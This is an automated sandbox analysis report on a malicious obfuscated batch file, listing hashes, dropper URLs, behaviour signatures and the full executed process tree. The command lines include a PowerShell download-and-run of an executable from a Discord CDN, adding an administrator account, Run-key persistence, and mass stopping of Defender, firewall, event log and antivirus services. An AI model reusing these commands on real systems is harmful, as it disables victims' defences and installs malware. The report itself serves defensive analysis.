e8266fb4c02fdf3d4b449814100c4839a52ceeeeb175f816b357cb695b4b1751

Analysis

max time kernel
150s
max time network
48s
platform
windows7_x64
resource
win7-20220414-en
submitted
19-05-2022 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YourCyanide_obf.bat
Size

136KB
MD5

60105b0d25a609bbf93236f003064d2c
SHA1

bf5fae15e830e6793d2b5b60af0cbb92a4098663
SHA256

e8266fb4c02fdf3d4b449814100c4839a52ceeeeb175f816b357cb695b4b1751
SHA512

b6d4259a2e1eca153d39299d1cfa16b2f1b07eead78b1afc8b4ebd6af17805c6d1112c6ed82e362430b7d6bf180822a3c44e819593da724706499e4c04b7d89c

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1640 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

NoKeyB.exe

pid process

1656 NoKeyB.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

1036 cmd.exe

flow	pid	process
4	1640	powershell.exe

pid	process
1656	NoKeyB.exe

pid	process
1036	cmd.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_7961_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide_obf.bat"	reg.exe

Drops file in Windows directory 4 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\Confession.bat	cmd.exe
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe
File created	C:\Windows\Confession.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

2692 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2232 systeminfo.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1500 taskkill.exe

pid	process
2692	ipconfig.exe

pid	process
2232	systeminfo.exe

pid	process
1500	taskkill.exe

NTFS ADS 2 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%tmDUu:~17	cmd.exe
File opened for modification	C:\Users\Admin\%etozn:~1	cmd.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exescrnsave.scrscrnsave.scrscrnsave.scrscrnsave.scr

pid process

1752 powershell.exe
1752 powershell.exe
1640 powershell.exe
428 scrnsave.scr
968 scrnsave.scr
1620 scrnsave.scr
1488 scrnsave.scr

pid	process
1752	powershell.exe
1752	powershell.exe
1640	powershell.exe
428	scrnsave.scr
968	scrnsave.scr
1620	scrnsave.scr
1488	scrnsave.scr

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exetaskkill.exescrnsave.scrscrnsave.scrscrnsave.scrscrnsave.scr

description	pid	process
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	428	scrnsave.scr
Token: SeDebugPrivilege	968	scrnsave.scr
Token: SeDebugPrivilege	1620	scrnsave.scr
Token: SeDebugPrivilege	1488	scrnsave.scr

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

NoKeyB.exe

pid process

1656 NoKeyB.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

NoKeyB.exe

pid process

1656 NoKeyB.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

NoKeyB.exe

pid process

1656 NoKeyB.exe

pid	process
1656	NoKeyB.exe

pid	process
1656	NoKeyB.exe

pid	process
1656	NoKeyB.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1036 wrote to memory of 2016	1036	cmd.exe	WScript.exe
PID 1036 wrote to memory of 2016	1036	cmd.exe	WScript.exe
PID 1036 wrote to memory of 2016	1036	cmd.exe	WScript.exe
PID 1036 wrote to memory of 1752	1036	cmd.exe	powershell.exe
PID 1036 wrote to memory of 1752	1036	cmd.exe	powershell.exe
PID 1036 wrote to memory of 1752	1036	cmd.exe	powershell.exe
PID 1036 wrote to memory of 1108	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1108	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1108	1036	cmd.exe	net.exe
PID 1108 wrote to memory of 632	1108	net.exe	net1.exe
PID 1108 wrote to memory of 632	1108	net.exe	net1.exe
PID 1108 wrote to memory of 632	1108	net.exe	net1.exe
PID 1036 wrote to memory of 1728	1036	cmd.exe	reg.exe
PID 1036 wrote to memory of 1728	1036	cmd.exe	reg.exe
PID 1036 wrote to memory of 1728	1036	cmd.exe	reg.exe
PID 1036 wrote to memory of 1848	1036	cmd.exe	reg.exe
PID 1036 wrote to memory of 1848	1036	cmd.exe	reg.exe
PID 1036 wrote to memory of 1848	1036	cmd.exe	reg.exe
PID 1036 wrote to memory of 1872	1036	cmd.exe	rundll32.exe
PID 1036 wrote to memory of 1872	1036	cmd.exe	rundll32.exe
PID 1036 wrote to memory of 1872	1036	cmd.exe	rundll32.exe
PID 1036 wrote to memory of 1640	1036	cmd.exe	powershell.exe
PID 1036 wrote to memory of 1640	1036	cmd.exe	powershell.exe
PID 1036 wrote to memory of 1640	1036	cmd.exe	powershell.exe
PID 1036 wrote to memory of 1656	1036	cmd.exe	NoKeyB.exe
PID 1036 wrote to memory of 1656	1036	cmd.exe	NoKeyB.exe
PID 1036 wrote to memory of 1656	1036	cmd.exe	NoKeyB.exe
PID 1036 wrote to memory of 1616	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1616	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1616	1036	cmd.exe	net.exe
PID 1616 wrote to memory of 1584	1616	net.exe	net1.exe
PID 1616 wrote to memory of 1584	1616	net.exe	net1.exe
PID 1616 wrote to memory of 1584	1616	net.exe	net1.exe
PID 1036 wrote to memory of 1244	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1244	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1244	1036	cmd.exe	net.exe
PID 1244 wrote to memory of 888	1244	net.exe	net1.exe
PID 1244 wrote to memory of 888	1244	net.exe	net1.exe
PID 1244 wrote to memory of 888	1244	net.exe	net1.exe
PID 1036 wrote to memory of 1500	1036	cmd.exe	taskkill.exe
PID 1036 wrote to memory of 1500	1036	cmd.exe	taskkill.exe
PID 1036 wrote to memory of 1500	1036	cmd.exe	taskkill.exe
PID 1036 wrote to memory of 836	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 836	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 836	1036	cmd.exe	net.exe
PID 836 wrote to memory of 952	836	net.exe	net1.exe
PID 836 wrote to memory of 952	836	net.exe	net1.exe
PID 836 wrote to memory of 952	836	net.exe	net1.exe
PID 1036 wrote to memory of 1984	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1984	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1984	1036	cmd.exe	net.exe
PID 1984 wrote to memory of 1424	1984	net.exe	net1.exe
PID 1984 wrote to memory of 1424	1984	net.exe	net1.exe
PID 1984 wrote to memory of 1424	1984	net.exe	net1.exe
PID 1036 wrote to memory of 1356	1036	cmd.exe	netsh.exe
PID 1036 wrote to memory of 1356	1036	cmd.exe	netsh.exe
PID 1036 wrote to memory of 1356	1036	cmd.exe	netsh.exe
PID 1036 wrote to memory of 1308	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1308	1036	cmd.exe	net.exe
PID 1036 wrote to memory of 1308	1036	cmd.exe	net.exe
PID 1308 wrote to memory of 820	1308	net.exe	net1.exe
PID 1308 wrote to memory of 820	1308	net.exe	net1.exe
PID 1308 wrote to memory of 820	1308	net.exe	net1.exe
PID 1036 wrote to memory of 892	1036	cmd.exe	net.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HideyHidey.vbs"
2⤵
PID:2016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
3⤵
PID:632

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_7961_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat /f
2⤵
- Adds Run key to start application
PID:1728

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
2⤵
PID:1848

C:\Windows\system32\rundll32.exe
RUNDLL32 USER32.DLL SwapMouseButton
2⤵
PID:1872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Users\Admin\Documents\NoKeyB.exe
NoKeyB.exe
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1656

C:\Windows\system32\net.exe
net stop "wuauserv"
2⤵
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wuauserv"
3⤵
PID:1584

C:\Windows\system32\net.exe
net stop "WinDefend"
2⤵
- Suspicious use of WriteProcessMemory
PID:1244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
3⤵
PID:888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRT /y
3⤵
PID:888

C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500

C:\Windows\system32\net.exe
net stop "security center"
2⤵
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "security center"
3⤵
PID:952

C:\Windows\system32\net.exe
net stop sharedaccess
2⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sharedaccess
3⤵
PID:1424

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode-disable
2⤵
PID:1356

C:\Windows\system32\net.exe
net stop "Security Center" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Security Center" /y
3⤵
PID:820

C:\Windows\system32\net.exe
net stop "Automatic Updates" /y
2⤵
PID:892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Automatic Updates" /y
3⤵
PID:1756

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:1368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:1632

C:\Windows\system32\net.exe
net stop "SAVScan" /y
2⤵
PID:1992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVScan" /y
3⤵
PID:1160

C:\Windows\system32\net.exe
net stop "norton AntiVirus Firewall Monitor Service" /y
2⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
3⤵
PID:1776

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto-Protect Service" /y
2⤵
PID:428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
3⤵
PID:1488

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:1600

C:\Windows\system32\net.exe
net stop "McAfee Spamkiller Server" /y
2⤵
PID:632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
3⤵
PID:288

C:\Windows\system32\net.exe
net stop "McAfee Personal Firewall Service" /y
2⤵
PID:308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
3⤵
PID:624

C:\Windows\system32\net.exe
net stop "McAfee SecurityCenter Update Manager" /y
2⤵
PID:784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
3⤵
PID:1516

C:\Windows\system32\net.exe
net stop "Symantec SPBBCSvc" /y
2⤵
PID:1936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
3⤵
PID:1720

C:\Windows\system32\net.exe
net stop "Ahnlab Task Scheduler" /y
2⤵
PID:756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
3⤵
PID:2016

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:1744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:564

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1176

C:\Windows\system32\net.exe
net stop vrmonsvc /y
2⤵
PID:1412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vrmonsvc /y
3⤵
PID:1568

C:\Windows\system32\net.exe
net stop MonSvcNT /y
2⤵
PID:300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MonSvcNT /y
3⤵
PID:1584

C:\Windows\system32\net.exe
net stop SAVScan /y
2⤵
PID:1384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVScan /y
3⤵
PID:888

C:\Windows\system32\net.exe
net stop NProtectService /y
2⤵
PID:1788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NProtectService /y
3⤵
PID:1072

C:\Windows\system32\net.exe
net stop ccSetMGR /y
2⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMGR /y
3⤵
PID:948

C:\Windows\system32\net.exe
net stop ccEvtMGR /y
2⤵
PID:1724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMGR /y
3⤵
PID:1700

C:\Windows\system32\net.exe
net stop srservice /y
2⤵
PID:1280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop srservice /y
3⤵
PID:828

C:\Windows\system32\net.exe
net stop "Symantec Network Drivers Service" /y
2⤵
PID:1708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
3⤵
PID:1364

C:\Windows\system32\net.exe
net stop "norton Unerase Protection" /y
2⤵
PID:1268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton Unerase Protection" /y
3⤵
PID:820

C:\Windows\system32\net.exe
net stop MskService /y
2⤵
PID:1308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MskService /y
3⤵
PID:276

C:\Windows\system32\net.exe
net stop MpfService /y
2⤵
PID:1756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MpfService /y
3⤵
PID:892

C:\Windows\system32\net.exe
net stop mcupdmgr.exe /y
2⤵
PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mcupdmgr.exe /y
3⤵
PID:1632

C:\Windows\system32\net.exe
net stop "McAfeeAntiSpyware" /y
2⤵
PID:1368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
3⤵
PID:692

C:\Windows\system32\net.exe
net stop helpsvc /y
2⤵
PID:1160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop helpsvc /y
3⤵
PID:1992

C:\Windows\system32\net.exe
net stop ERSvc /y
2⤵
PID:1264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ERSvc /y
3⤵
PID:1776

C:\Windows\system32\net.exe
net stop "*norton*" /y
2⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*norton*" /y
3⤵
PID:1752

C:\Windows\system32\net.exe
net stop "*Symantec*" /y
2⤵
PID:1488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*Symantec*" /y
3⤵
PID:428

C:\Windows\system32\net.exe
net stop "*McAfee*" /y
2⤵
PID:1604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*McAfee*" /y
3⤵
PID:1600

C:\Windows\system32\net.exe
net stop ccPwdSvc /y
2⤵
PID:868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccPwdSvc /y
3⤵
PID:1728

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:632

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:1872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:624

C:\Windows\system32\net.exe
net stop "Serv-U" /y
2⤵
PID:308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Serv-U" /y
3⤵
PID:1068

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:1516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:784

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:1720

C:\Windows\system32\net.exe
net stop "Symantec AntiVirus Client" /y
2⤵
PID:1936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
3⤵
PID:1996

C:\Windows\system32\net.exe
net stop "norton AntiVirus Server" /y
2⤵
PID:2016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
3⤵
PID:756

C:\Windows\system32\net.exe
net stop "NAV Alert" /y
2⤵
PID:1112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NAV Alert" /y
3⤵
PID:564

C:\Windows\system32\net.exe
net stop "Nav Auto-Protect" /y
2⤵
PID:1744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
3⤵
PID:1512

C:\Windows\system32\net.exe
net stop "McShield" /y
2⤵
PID:1176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McShield" /y
3⤵
PID:380

C:\Windows\system32\net.exe
net stop "DefWatch" /y
2⤵
PID:556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "DefWatch" /y
3⤵
PID:1568

C:\Windows\system32\net.exe
net stop eventlog /y
2⤵
PID:1412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop eventlog /y
3⤵
PID:1616

C:\Windows\system32\net.exe
net stop InoRPC /y
2⤵
PID:1584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRPC /y
3⤵
PID:300

C:\Windows\system32\net.exe
net stop InoRT /y
2⤵
PID:1244

C:\Windows\system32\net.exe
net stop InoTask /y
2⤵
PID:1384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoTask /y
3⤵
PID:1200

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:1072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:1788

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:948

C:\Windows\system32\net.exe
net stop "norton AntiVirus Corporate Edition" /y
2⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
3⤵
PID:1424

C:\Windows\system32\net.exe
net stop "ViRobot Professional Monitoring" /y
2⤵
PID:1700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
3⤵
PID:1724

C:\Windows\system32\net.exe
net stop "PC-cillin Personal Firewall" /y
2⤵
PID:1324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
3⤵
PID:828

C:\Windows\system32\net.exe
net stop "Trend Micro Proxy Service" /y
2⤵
PID:1280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
3⤵
PID:1356

C:\Windows\system32\net.exe
net stop "Trend NT Realtime Service" /y
2⤵
PID:1364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
3⤵
PID:1708

C:\Windows\system32\net.exe
net stop "McAfee.com McShield" /y
2⤵
PID:1240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com McShield" /y
3⤵
PID:1732

C:\Windows\system32\net.exe
net stop "McAfee.com VirusScan Online Realtime Engine" /y
2⤵
PID:1928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
3⤵
PID:1980

C:\Windows\system32\net.exe
net stop "SyGateService" /y
2⤵
PID:1756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SyGateService" /y
3⤵
PID:1632

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1576

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus" /y
2⤵
PID:1992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
3⤵
PID:1104

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus Network" /y
2⤵
PID:684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
3⤵
PID:1968

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Job Server" /y
2⤵
PID:520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
3⤵
PID:976

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Realtime Server" /y
2⤵
PID:956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
3⤵
PID:1736

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:1664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:1740

C:\Windows\system32\net.exe
net stop "eTrust Antivirus RPC Server" /y
2⤵
PID:1108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
3⤵
PID:1848

C:\Windows\system32\net.exe
net stop netsvcs
2⤵
PID:1168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop netsvcs
3⤵
PID:108

C:\Windows\system32\net.exe
net stop spoolnt
2⤵
PID:1800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop spoolnt
3⤵
PID:1808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
2⤵
PID:1660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
2⤵
PID:540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
PID:1528

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1648

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1368

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1800

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1632

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:820

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:632

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2136

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2184

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2316

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2456

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2596

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2692

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2732

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2768

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2836

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2860

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2916

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2976

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3004

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3060

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2068

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2144

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2156

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1200

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1756

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2316

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2412

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2476

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2676

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2600

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2712

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2836

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2832

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2956

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2796

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3040

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2392

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2460

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2552

C:\Windows\system32\scrnsave.scr
